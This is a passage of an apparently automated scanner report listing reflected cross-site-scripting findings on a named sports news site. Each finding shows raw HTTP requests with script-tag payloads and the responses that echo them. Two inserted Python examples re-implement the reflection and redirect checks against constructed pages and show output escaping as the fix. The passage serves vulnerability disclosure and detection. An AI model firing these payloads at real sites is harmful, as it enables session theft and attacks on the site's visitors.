...[SNIP]...
<strong>"/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html482cc<script>alert(1)</script>7bb299f040c"</strong>
...[SNIP]...

2.197. http://www.csnbaltimore.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2df49<script>alert(1)</script>ad9caa4b51a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html2df49<script>alert(1)</script>ad9caa4b51a HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:10 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html2df49<script>alert(1)</script>ad9caa4b51a"</strong>
...[SNIP]...

2.198. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11101<script>alert(1)</script>7ea30cac90f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common11101<script>alert(1)</script>7ea30cac90f/global_flash/player/player.php HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:05 GMT
Content-Length: 795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common11101<script>alert(1)</script>7ea30cac90f/global_flash/player/player.php"</strong>
...[SNIP]...

2.199. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42796<script>alert(1)</script>16425f7544b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash42796<script>alert(1)</script>16425f7544b/player/player.php HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:07 GMT
Content-Length: 795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash42796<script>alert(1)</script>16425f7544b/player/player.php"</strong>
...[SNIP]...

2.200. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b920<script>alert(1)</script>7b7a88bb32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player7b920<script>alert(1)</script>7b7a88bb32/player.php HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:07 GMT
Content-Length: 794
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player7b920<script>alert(1)</script>7b7a88bb32/player.php"</strong>
...[SNIP]...

2.201. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 427d9<script>alert(1)</script>4409074b274 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.php427d9<script>alert(1)</script>4409074b274 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:08 GMT
Content-Length: 795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.php427d9<script>alert(1)</script>4409074b274"</strong>
...[SNIP]...

2.202. http://www.csnbaltimore.com/common/js/aggregate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2bec9<script>alert(1)</script>475f72e549d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/2bec9<script>alert(1)</script>475f72e549d HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:01 GMT
Content-Length: 768
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/2bec9<script>alert(1)</script>475f72e549d"</strong>
...[SNIP]...

2.203. http://www.csnbaltimore.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c87c9<script>alert(1)</script>f27a974b0cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c87c9<script>alert(1)</script>f27a974b0cb HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:47 GMT
Connection: close
Content-Length: 758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/c87c9<script>alert(1)</script>f27a974b0cb"</strong>
...[SNIP]...

2.204. http://www.csnbaltimore.com/pages/landing [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/landing

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec77d<script>alert(1)</script>9b71b5ef431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesec77d<script>alert(1)</script>9b71b5ef431/landing HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Content-Length: 771
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesec77d<script>alert(1)</script>9b71b5ef431/landing"</strong>
...[SNIP]...

2.205. http://www.csnbaltimore.com/pages/landing [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/landing

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 662ba<script>alert(1)</script>16228c3e9fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/landing662ba<script>alert(1)</script>16228c3e9fd HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:13 GMT
Content-Length: 790
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/landing662ba<script>alert(1)</script>16228c3e9fd"</strong>
...[SNIP]...
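The note in this finding says the scanner had to follow a redirect before its payload came back: the page that echoes the string is the 404 handler at /common/404.html, and what it echoes is its own request URI, with the originally requested path carried in p=. The block below is an added example for this page, not code from the XSS.CX report or from the site; it reproduces that chain offline against a constructed stand-in server. The intermediate 302 and its Location header are an assumption, since the report shows only the final response. The point it makes is a practical one: a client that does not follow redirects (curl without -L, a naive fuzzer reading only the first response) sees a bare 302 and reports no reflection, while a browser follows automatically and lands on the vulnerable 404 page.

```python
"""Follow a redirect chain and check where a probe string comes back.

Added example, not part of the report.  `fake_server` is a constructed
stand-in: the 302 hop is assumed, the 404 body echoes the request URI
raw in the shape the report's responses show.
"""
import urllib.parse

# Probe in the report's shape (random hex around the script tag).
PAYLOAD = "662ba<script>alert(1)</script>16228c3e9fd"


def not_found_page(request_uri):
    """Constructed 404 body: echoes the request URI without HTML encoding."""
    return ('<html><body><p>The requested URL <strong>"' + request_uri +
            '"</strong> was not found.</p></body></html>')


def fake_server(request_uri):
    """Constructed stand-in for the site.  Assumption: unknown paths under
    /pages/ are redirected to the 404 handler with the original URI in p=,
    and the handler echoes the URI it was itself requested with."""
    path = urllib.parse.urlsplit(request_uri).path
    if path.startswith("/pages/") and path not in ("/pages/landing", "/pages/main"):
        return 302, {"Location": "/common/404.html?p=" + request_uri}, ""
    if path == "/common/404.html":
        return 404, {"Content-Type": "text/html"}, not_found_page(request_uri)
    return 200, {"Content-Type": "text/html"}, "<html><body>ok</body></html>"


def fetch(server, request_uri, follow_redirects=True, max_hops=5):
    """Return (final_status, final_body, chain); chain lists every URI asked for.
    Caps the hop count and refuses loops, as a scanner's HTTP layer must."""
    chain = [request_uri]
    status, headers, body = server(request_uri)
    while follow_redirects and status in (301, 302, 303, 307, 308):
        if len(chain) > max_hops:
            raise RuntimeError("too many redirects: " + " -> ".join(chain))
        nxt = urllib.parse.urljoin(request_uri, headers["Location"])
        if nxt in chain:
            raise RuntimeError("redirect loop at " + nxt)
        request_uri = nxt
        chain.append(request_uri)
        status, headers, body = server(request_uri)
    return status, body, chain


def reflected_after_redirect(payload, start="/pages/landing"):
    """Compare what a non-following client and a following client observe
    for the same probe appended to `start`."""
    uri = start + payload
    direct_status, direct_body, _ = fetch(fake_server, uri, follow_redirects=False)
    final_status, final_body, chain = fetch(fake_server, uri)
    return {
        "without_follow": (direct_status, payload in direct_body),
        "with_follow": (final_status, payload in final_body),
        "chain": chain,
    }


if __name__ == "__main__":
    result = reflected_after_redirect(PAYLOAD)
    print("first response only :", result["without_follow"])
    print("after following     :", result["with_follow"])
    print("chain               :", " -> ".join(result["chain"]))
```

The same check applies to the other "Response (redirected)" findings on /pages/main, /pages/profiles and /pages/video below: the payload is only visible once the client has requested /common/404.html?p=... itself.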

2.206. http://www.csnbaltimore.com/pages/landing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/landing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7173f"><script>alert(1)</script>6e8be881a63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/landing?7173f"><script>alert(1)</script>6e8be881a63=1 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 30978
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web1.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="7173f"><script>alert(1)</script>6e8be881a63" id = "7173f">
...[SNIP]...
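The findings on this host come in two shapes. In the 404 pages (2.197 through 2.205 and their siblings below) the request path is copied as plain text between `<strong>` tags, so a bare `<script>` in a path segment executes; the 404 status does not help, since the body is served as text/html and browsers render and script it like any other page. In the /pages/* findings such as this one, the *name* of an arbitrary query parameter is copied into a double-quoted `name="..."` attribute of a hidden input, so the probe must first close the attribute with `">` before its tag can open. The block below is an added example for this page, not code from the XSS.CX report or from the scanned site: it re-implements the scanner's check (is the prefix+probe+suffix echoed unmodified, and in which context did it land) against constructed sample pages that mimic both shapes, and puts the hardened template beside each raw echo, HTML-encoding with `html.escape(..., quote=True)` before interpolation. The template strings, parameter names and the `render_*` helpers are constructed for illustration.

```python
"""Reflection-context check behind reflected-XSS findings like those above.

Added example, not part of the report.  Sample pages are CONSTRUCTED to
mimic the two shapes the findings show: a 404 page echoing the request URI
between <strong> tags, and a hidden <input> whose name attribute echoes an
arbitrary query-parameter name.
"""
import html

# Probes in the report's shape; the scanner wraps them in random hex so the
# reflection can be located unambiguously.
PROBE_TEXT = "<script>alert(1)</script>"        # works between tags
PROBE_ATTR = '"><script>alert(1)</script>'      # closes a "..." attribute first


def reflection_context(body, pos):
    """Classify offset `pos` in `body` as 'text', 'tag' or 'attr_dq'.

    Looks backwards from pos: if the nearest '<' is not yet closed by '>',
    we are inside a tag; an odd number of '"' since that '<' means we are
    inside a double-quoted attribute value.
    """
    head = body[:pos]
    lt, gt = head.rfind("<"), head.rfind(">")
    if lt > gt:
        return "attr_dq" if head[lt:].count('"') % 2 == 1 else "tag"
    return "text"


def classify(body, prefix, probe, suffix):
    """Mirror the scanner's 'Issue detail': was prefix+probe+suffix echoed
    unmodified, and does the probe fit the context it landed in?"""
    payload = prefix + probe + suffix
    pos = body.find(payload)
    if pos == -1:
        # Not echoed verbatim; see whether an HTML-encoded copy is present.
        encoded = html.escape(payload, quote=True) in body
        return {"reflected": encoded, "unmodified": False,
                "context": None, "exploitable": False}
    ctx = reflection_context(body, pos)
    # Between tags any '<' opens a tag; inside a "..." attribute the probe
    # must close the quote before its '<' means anything.
    exploitable = (ctx == "text" and "<" in probe) or \
                  (ctx == "attr_dq" and probe.startswith('"') and "<" in probe)
    return {"reflected": True, "unmodified": True,
            "context": ctx, "exploitable": exploitable}


def render_404(request_uri, escape):
    """Constructed 404 template in the shape the report shows.
    escape=False reproduces the vulnerable raw echo; escape=True is the fix."""
    shown = html.escape(request_uri, quote=True) if escape else request_uri
    return ('<html><body><p>The requested URL <strong>"' + shown +
            '"</strong> was not found.</p></body></html>')


def render_hidden_input(param_name, escape):
    """Constructed page copying a query-parameter *name* into a double-quoted
    attribute, as the /pages/* findings show."""
    shown = html.escape(param_name, quote=True) if escape else param_name
    return ('<html><body><form><input type=hidden name="' + shown +
            '" value="1"></form></body></html>')


def check_404(prefix, probe, suffix, escape):
    uri = ("/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html"
           + prefix + probe + suffix)
    return classify(render_404(uri, escape), prefix, probe, suffix)


def check_hidden_input(prefix, probe, suffix, escape):
    return classify(render_hidden_input(prefix + probe + suffix, escape),
                    prefix, probe, suffix)


if __name__ == "__main__":
    for name, fn in (("404 page", check_404), ("hidden input", check_hidden_input)):
        for probe in (PROBE_TEXT, PROBE_ATTR):
            for escape in (False, True):
                r = fn("2df49", probe, "ad9caa4b51a", escape)
                print(f"{name:12} probe={probe!r:30} escaped={escape!s:5} -> "
                      f"context={r['context']} exploitable={r['exploitable']}")
```

Two things the output makes visible that the report's one-line summaries do not: the text-context probe is harmless when it lands inside the attribute (it never leaves the quoted value), which is why the scanner uses a separate `">`-prefixed probe there; and once output is encoded, the payload is still "reflected" in the sense of being present, but only as `&lt;script&gt;`, which the classifier correctly refuses to call exploitable.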

2.207. http://www.csnbaltimore.com/pages/main [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93041<script>alert(1)</script>c8d8901bf53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages93041<script>alert(1)</script>c8d8901bf53/main HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Referer: http://www.csnbaltimore.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:00 GMT
Connection: close
Content-Length: 768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages93041<script>alert(1)</script>c8d8901bf53/main"</strong>
...[SNIP]...

2.208. http://www.csnbaltimore.com/pages/main [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf476<script>alert(1)</script>07c535177df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/maincf476<script>alert(1)</script>07c535177df HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Referer: http://www.csnbaltimore.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:00 GMT
Connection: close
Content-Length: 787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/maincf476<script>alert(1)</script>07c535177df"</strong>
...[SNIP]...

2.209. http://www.csnbaltimore.com/pages/main [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/main

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a7c5"><script>alert(1)</script>9bf552f789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/main?9a7c5"><script>alert(1)</script>9bf552f789=1 HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Referer: http://www.csnbaltimore.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: PHPSESSID=09af6988921e1a055261e6e4db956dbc; path=/
Vary: Accept-Encoding
Expires: Sun, 19 Dec 2010 18:31:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:00 GMT
Connection: close
Content-Length: 71533

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web4.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="9a7c5"><script>alert(1)</script>9bf552f789" id = "9a7c5">
...[SNIP]...

2.210. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/profiles

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5a40<script>alert(1)</script>2fc595593ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesd5a40<script>alert(1)</script>2fc595593ef/profiles HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:11 GMT
Content-Length: 772
Connection: close

